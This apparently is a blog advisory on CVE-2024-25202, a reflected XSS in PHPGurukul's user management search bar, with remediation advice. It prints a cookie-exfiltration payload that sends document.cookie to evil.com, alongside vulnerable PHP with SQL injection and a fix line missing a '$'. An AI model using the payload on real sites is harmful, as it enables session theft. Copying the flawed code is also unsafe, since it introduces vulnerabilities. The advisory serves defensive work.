Discovered: Early 2024
Component: PHPGurukul User Registration & Login and User Management System *v1.*
Vulnerability Type: Cross-Site Scripting (XSS)
CVE: CVE-2024-25202
Introduction
In February 2024, a critical XSS flaw was found in the popular PHPGurukul User Registration & Login and User Management System (version 1.). If you manage a PHPGurukul-based website and haven’t patched this yet, your users (and your admin!) are at risk right now.
This article walks through the vulnerability, how it works, example exploit code, and steps for protection. Whether you’re curious, learning web security, or need to fix your site, we’ve got you covered.
What is CVE-2024-25202?
CVE-2024-25202 is an authenticated Cross-Site Scripting (XSS) bug in the *search bar* of the PHPGurukul User Management System. The search functionality fails to sanitize input, so an attacker can inject and execute JavaScript by simply entering their payload in the search box.
Why is this dangerous?
The attacker can steal your cookies, hijack sessions, or even rewrite parts of your page to trick users into giving up passwords. Any JavaScript code they want can run in your browser while you’re logged in.
> Original Advisory:
> - NVD Entry: CVE-2024-25202
> - Exploit Details on Exploit-DB (if/when published)
Where’s the Bug? The Search Bar
The vulnerable code lives in the *search*. Here’s a simplified (but real-world) example. Most PHPGurukul systems have something close to this:
// file: search.php (simplified excerpt)
$searchKey = $_GET['search']; // No sanitization!!!
$query = "SELECT * FROM users WHERE username LIKE '%$searchKey%' ";
$result = mysqli_query($conn, $query);
echo "You searched for: $searchKey";
// ... render results
Notice: whatever the user puts in $_GET['search'] gets echoed—no filter, no HTML escape!
Let’s say an attacker navigates to
http://victim-site.com/search.php?search=<script>alert('XSS!')</script>;
This will make the victim’s browser pop up an XSS alert box. In real attacks, instead of alert('XSS!'), an attacker could steal your cookies, deface your page, or send data to an external server.
Paste this in the search box
"><script>fetch('https://evil.com/'+document.cookie)</script>
Or in the URL bar
http://your-site/search.php?search=%22%3E%3Cscript%3Efetch('https://evil.com/'+document.cookie)%3C/script%3E
Anyone viewing this results page will have their cookies exfiltrated to the attacker. If the session cookie is not bound to IP or TTL, a full account hijack is possible.
Attacker’s JavaScript runs with the victim’s cookies and permissions.
Because this is a reflected XSS, the victim has to click a link (or be tricked to do a search). But if the attacker is able to post links somewhere public or send them by email, they can target admins for maximum damage.
1. Filter & escape all output!
* Never output user data directly unless you use htmlspecialchars() in PHP.
How to fix
safeKey = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "You searched for: $safeKey";
For extra protection from SQL injection (not the direct cause here but also important)
$stmt = $conn->prepare("SELECT * FROM users WHERE username LIKE ?");
$param = "%".$_GET['search']."%";
$stmt->bind_param("s", $param);
// ...
3. Apply security updates early
Check phpgurukul’s official site and their Github for patches.
In Closing: What You Must Do
- If you run PHPGurukul registration & login systems: patch, upgrade, and audit any search/echo paths, *now*.
References & Further Reading
- CVE-2024-25202 – NVD Advisory
- phpgurukul.com
- OWASP XSS Cheat Sheet
- Common PHP XSS Fixes
Timeline
Published on: 02/28/2024 20:15:41 UTC
Last modified on: 08/01/2024 13:47:35 UTC